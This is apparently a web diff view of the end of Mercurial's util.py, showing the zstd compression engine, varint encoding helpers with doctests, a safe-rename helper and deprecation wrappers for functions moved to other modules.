3845 def decompressorreader(self, fh):
3845 zstd = self._module
3846 zstd = self._module
3846 dctx = zstd.ZstdDecompressor()
3847 dctx = zstd.ZstdDecompressor()
3847 return chunkbuffer(dctx.read_from(fh))
3848 return chunkbuffer(dctx.read_from(fh))
3848
3849
3849 class zstdrevlogcompressor(object):
3850 class zstdrevlogcompressor(object):
3850 def __init__(self, zstd, level=3):
3851 def __init__(self, zstd, level=3):
3851 # Writing the content size adds a few bytes to the output. However,
3852 # Writing the content size adds a few bytes to the output. However,
3852 # it allows decompression to be more optimal since we can
3853 # it allows decompression to be more optimal since we can
3853 # pre-allocate a buffer to hold the result.
3854 # pre-allocate a buffer to hold the result.
3854 self._cctx = zstd.ZstdCompressor(level=level,
3855 self._cctx = zstd.ZstdCompressor(level=level,
3855 write_content_size=True)
3856 write_content_size=True)
3856 self._dctx = zstd.ZstdDecompressor()
3857 self._dctx = zstd.ZstdDecompressor()
3857 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3858 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3858 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3859 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3859
3860
3860 def compress(self, data):
3861 def compress(self, data):
3861 insize = len(data)
3862 insize = len(data)
3862 # Caller handles empty input case.
3863 # Caller handles empty input case.
3863 assert insize > 0
3864 assert insize > 0
3864
3865
3865 if insize < 50:
3866 if insize < 50:
3866 return None
3867 return None
3867
3868
3868 elif insize <= 1000000:
3869 elif insize <= 1000000:
3869 compressed = self._cctx.compress(data)
3870 compressed = self._cctx.compress(data)
3870 if len(compressed) < insize:
3871 if len(compressed) < insize:
3871 return compressed
3872 return compressed
3872 return None
3873 return None
3873 else:
3874 else:
3874 z = self._cctx.compressobj()
3875 z = self._cctx.compressobj()
3875 chunks = []
3876 chunks = []
3876 pos = 0
3877 pos = 0
3877 while pos < insize:
3878 while pos < insize:
3878 pos2 = pos + self._compinsize
3879 pos2 = pos + self._compinsize
3879 chunk = z.compress(data[pos:pos2])
3880 chunk = z.compress(data[pos:pos2])
3880 if chunk:
3881 if chunk:
3881 chunks.append(chunk)
3882 chunks.append(chunk)
3882 pos = pos2
3883 pos = pos2
3883 chunks.append(z.flush())
3884 chunks.append(z.flush())
3884
3885
3885 if sum(map(len, chunks)) < insize:
3886 if sum(map(len, chunks)) < insize:
3886 return ''.join(chunks)
3887 return ''.join(chunks)
3887 return None
3888 return None
3888
3889
3889 def decompress(self, data):
3890 def decompress(self, data):
3890 insize = len(data)
3891 insize = len(data)
3891
3892
3892 try:
3893 try:
3893 # This was measured to be faster than other streaming
3894 # This was measured to be faster than other streaming
3894 # decompressors.
3895 # decompressors.
3895 dobj = self._dctx.decompressobj()
3896 dobj = self._dctx.decompressobj()
3896 chunks = []
3897 chunks = []
3897 pos = 0
3898 pos = 0
3898 while pos < insize:
3899 while pos < insize:
3899 pos2 = pos + self._decompinsize
3900 pos2 = pos + self._decompinsize
3900 chunk = dobj.decompress(data[pos:pos2])
3901 chunk = dobj.decompress(data[pos:pos2])
3901 if chunk:
3902 if chunk:
3902 chunks.append(chunk)
3903 chunks.append(chunk)
3903 pos = pos2
3904 pos = pos2
3904 # Frame should be exhausted, so no finish() API.
3905 # Frame should be exhausted, so no finish() API.
3905
3906
3906 return ''.join(chunks)
3907 return ''.join(chunks)
3907 except Exception as e:
3908 except Exception as e:
3908 raise error.RevlogError(_('revlog decompress error: %s') %
3909 raise error.RevlogError(_('revlog decompress error: %s') %
3909 stringutil.forcebytestr(e))
3910 stringutil.forcebytestr(e))
3910
3911
3911 def revlogcompressor(self, opts=None):
3912 def revlogcompressor(self, opts=None):
3912 opts = opts or {}
3913 opts = opts or {}
3913 return self.zstdrevlogcompressor(self._module,
3914 return self.zstdrevlogcompressor(self._module,
3914 level=opts.get('level', 3))
3915 level=opts.get('level', 3))
3915
3916
3916 compengines.register(_zstdengine())
3917 compengines.register(_zstdengine())
3917
3918
3918 def bundlecompressiontopics():
3919 def bundlecompressiontopics():
3919 """Obtains a list of available bundle compressions for use in help."""
3920 """Obtains a list of available bundle compressions for use in help."""
3920 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3921 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3921 items = {}
3922 items = {}
3922
3923
3923 # We need to format the docstring. So use a dummy object/type to hold it
3924 # We need to format the docstring. So use a dummy object/type to hold it
3924 # rather than mutating the original.
3925 # rather than mutating the original.
3925 class docobject(object):
3926 class docobject(object):
3926 pass
3927 pass
3927
3928
3928 for name in compengines:
3929 for name in compengines:
3929 engine = compengines[name]
3930 engine = compengines[name]
3930
3931
3931 if not engine.available():
3932 if not engine.available():
3932 continue
3933 continue
3933
3934
3934 bt = engine.bundletype()
3935 bt = engine.bundletype()
3935 if not bt or not bt[0]:
3936 if not bt or not bt[0]:
3936 continue
3937 continue
3937
3938
3938 doc = pycompat.sysstr('``%s``\n %s') % (
3939 doc = pycompat.sysstr('``%s``\n %s') % (
3939 bt[0], engine.bundletype.__doc__)
3940 bt[0], engine.bundletype.__doc__)
3940
3941
3941 value = docobject()
3942 value = docobject()
3942 value.__doc__ = doc
3943 value.__doc__ = doc
3943 value._origdoc = engine.bundletype.__doc__
3944 value._origdoc = engine.bundletype.__doc__
3944 value._origfunc = engine.bundletype
3945 value._origfunc = engine.bundletype
3945
3946
3946 items[bt[0]] = value
3947 items[bt[0]] = value
3947
3948
3948 return items
3949 return items
3949
3950
3950 i18nfunctions = bundlecompressiontopics().values()
3951 i18nfunctions = bundlecompressiontopics().values()
3951
3952
3952 # convenient shortcut
3953 # convenient shortcut
3953 dst = debugstacktrace
3954 dst = debugstacktrace
3954
3955
3955 def safename(f, tag, ctx, others=None):
3956 def safename(f, tag, ctx, others=None):
3956 """
3957 """
3957 Generate a name that it is safe to rename f to in the given context.
3958 Generate a name that it is safe to rename f to in the given context.
3958
3959
3959 f: filename to rename
3960 f: filename to rename
3960 tag: a string tag that will be included in the new name
3961 tag: a string tag that will be included in the new name
3961 ctx: a context, in which the new name must not exist
3962 ctx: a context, in which the new name must not exist
3962 others: a set of other filenames that the new name must not be in
3963 others: a set of other filenames that the new name must not be in
3963
3964
3964 Returns a file name of the form oldname~tag[~number] which does not exist
3965 Returns a file name of the form oldname~tag[~number] which does not exist
3965 in the provided context and is not in the set of other names.
3966 in the provided context and is not in the set of other names.
3966 """
3967 """
3967 if others is None:
3968 if others is None:
3968 others = set()
3969 others = set()
3969
3970
3970 fn = '%s~%s' % (f, tag)
3971 fn = '%s~%s' % (f, tag)
3971 if fn not in ctx and fn not in others:
3972 if fn not in ctx and fn not in others:
3972 return fn
3973 return fn
3973 for n in itertools.count(1):
3974 for n in itertools.count(1):
3974 fn = '%s~%s~%s' % (f, tag, n)
3975 fn = '%s~%s~%s' % (f, tag, n)
3975 if fn not in ctx and fn not in others:
3976 if fn not in ctx and fn not in others:
3976 return fn
3977 return fn
3977
3978
3978 def readexactly(stream, n):
3979 def readexactly(stream, n):
3979 '''read n bytes from stream.read and abort if less was available'''
3980 '''read n bytes from stream.read and abort if less was available'''
3980 s = stream.read(n)
3981 s = stream.read(n)
3981 if len(s) < n:
3982 if len(s) < n:
3982 raise error.Abort(_("stream ended unexpectedly"
3983 raise error.Abort(_("stream ended unexpectedly"
3983 " (got %d bytes, expected %d)")
3984 " (got %d bytes, expected %d)")
3984 % (len(s), n))
3985 % (len(s), n))
3985 return s
3986 return s
3986
3987
3987 def uvarintencode(value):
3988 def uvarintencode(value):
3988 """Encode an unsigned integer value to a varint.
3989 """Encode an unsigned integer value to a varint.
3989
3990
3990 A varint is a variable length integer of 1 or more bytes. Each byte
3991 A varint is a variable length integer of 1 or more bytes. Each byte
3991 except the last has the most significant bit set. The lower 7 bits of
3992 except the last has the most significant bit set. The lower 7 bits of
3992 each byte store the 2's complement representation, least significant group
3993 each byte store the 2's complement representation, least significant group
3993 first.
3994 first.
3994
3995
3995 >>> uvarintencode(0)
3996 >>> uvarintencode(0)
3996 '\\x00'
3997 '\\x00'
3997 >>> uvarintencode(1)
3998 >>> uvarintencode(1)
3998 '\\x01'
3999 '\\x01'
3999 >>> uvarintencode(127)
4000 >>> uvarintencode(127)
4000 '\\x7f'
4001 '\\x7f'
4001 >>> uvarintencode(1337)
4002 >>> uvarintencode(1337)
4002 '\\xb9\\n'
4003 '\\xb9\\n'
4003 >>> uvarintencode(65536)
4004 >>> uvarintencode(65536)
4004 '\\x80\\x80\\x04'
4005 '\\x80\\x80\\x04'
4005 >>> uvarintencode(-1)
4006 >>> uvarintencode(-1)
4006 Traceback (most recent call last):
4007 Traceback (most recent call last):
4007 ...
4008 ...
4008 ProgrammingError: negative value for uvarint: -1
4009 ProgrammingError: negative value for uvarint: -1
4009 """
4010 """
4010 if value < 0:
4011 if value < 0:
4011 raise error.ProgrammingError('negative value for uvarint: %d'
4012 raise error.ProgrammingError('negative value for uvarint: %d'
4012 % value)
4013 % value)
4013 bits = value & 0x7f
4014 bits = value & 0x7f
4014 value >>= 7
4015 value >>= 7
4015 bytes = []
4016 bytes = []
4016 while value:
4017 while value:
4017 bytes.append(pycompat.bytechr(0x80 | bits))
4018 bytes.append(pycompat.bytechr(0x80 | bits))
4018 bits = value & 0x7f
4019 bits = value & 0x7f
4019 value >>= 7
4020 value >>= 7
4020 bytes.append(pycompat.bytechr(bits))
4021 bytes.append(pycompat.bytechr(bits))
4021
4022
4022 return ''.join(bytes)
4023 return ''.join(bytes)
4023
4024
4024 def uvarintdecodestream(fh):
4025 def uvarintdecodestream(fh):
4025 """Decode an unsigned variable length integer from a stream.
4026 """Decode an unsigned variable length integer from a stream.
4026
4027
4027 The passed argument is anything that has a ``.read(N)`` method.
4028 The passed argument is anything that has a ``.read(N)`` method.
4028
4029
4029 >>> try:
4030 >>> try:
4030 ... from StringIO import StringIO as BytesIO
4031 ... from StringIO import StringIO as BytesIO
4031 ... except ImportError:
4032 ... except ImportError:
4032 ... from io import BytesIO
4033 ... from io import BytesIO
4033 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4034 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4034 0
4035 0
4035 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4036 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4036 1
4037 1
4037 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4038 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4038 127
4039 127
4039 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4040 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4040 1337
4041 1337
4041 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4042 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4042 65536
4043 65536
4043 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4044 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4044 Traceback (most recent call last):
4045 Traceback (most recent call last):
4045 ...
4046 ...
4046 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4047 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4047 """
4048 """
4048 result = 0
4049 result = 0
4049 shift = 0
4050 shift = 0
4050 while True:
4051 while True:
4051 byte = ord(readexactly(fh, 1))
4052 byte = ord(readexactly(fh, 1))
4052 result |= ((byte & 0x7f) << shift)
4053 result |= ((byte & 0x7f) << shift)
4053 if not (byte & 0x80):
4054 if not (byte & 0x80):
4054 return result
4055 return result
4055 shift += 7
4056 shift += 7
4056
4057
4057 ###
4058 ###
4058 # Deprecation warnings for util.py splitting
4059 # Deprecation warnings for util.py splitting
4059 ###
4060 ###
4060
4061
4061 def _deprecatedfunc(func, version):
4062 def _deprecatedfunc(func, version):
4062 def wrapped(*args, **kwargs):
4063 def wrapped(*args, **kwargs):
4063 fn = pycompat.sysbytes(func.__name__)
4064 fn = pycompat.sysbytes(func.__name__)
4064 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4065 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4065 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4066 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4066 nouideprecwarn(msg, version)
4067 nouideprecwarn(msg, version)
4067 return func(*args, **kwargs)
4068 return func(*args, **kwargs)
4068 wrapped.__name__ = func.__name__
4069 wrapped.__name__ = func.__name__
4069 return wrapped
4070 return wrapped
4070
4071
4071 defaultdateformats = dateutil.defaultdateformats
4072 defaultdateformats = dateutil.defaultdateformats
4072 extendeddateformats = dateutil.extendeddateformats
4073 extendeddateformats = dateutil.extendeddateformats
4073 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4074 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4074 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4075 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4075 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4076 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4076 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4077 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4077 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4078 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4078 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4079 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4079 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4080 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4080
4081
4081 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4082 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4082 binary = _deprecatedfunc(stringutil.binary, '4.6')
4083 binary = _deprecatedfunc(stringutil.binary, '4.6')
4083 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4084 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4084 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4085 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4085 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4086 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4086 email = _deprecatedfunc(stringutil.email, '4.6')
4087 email = _deprecatedfunc(stringutil.email, '4.6')
4087 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4088 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4088 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4089 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4089 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4090 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4090 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4091 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4091 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4092 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4092 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4093 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4093 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
4094 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now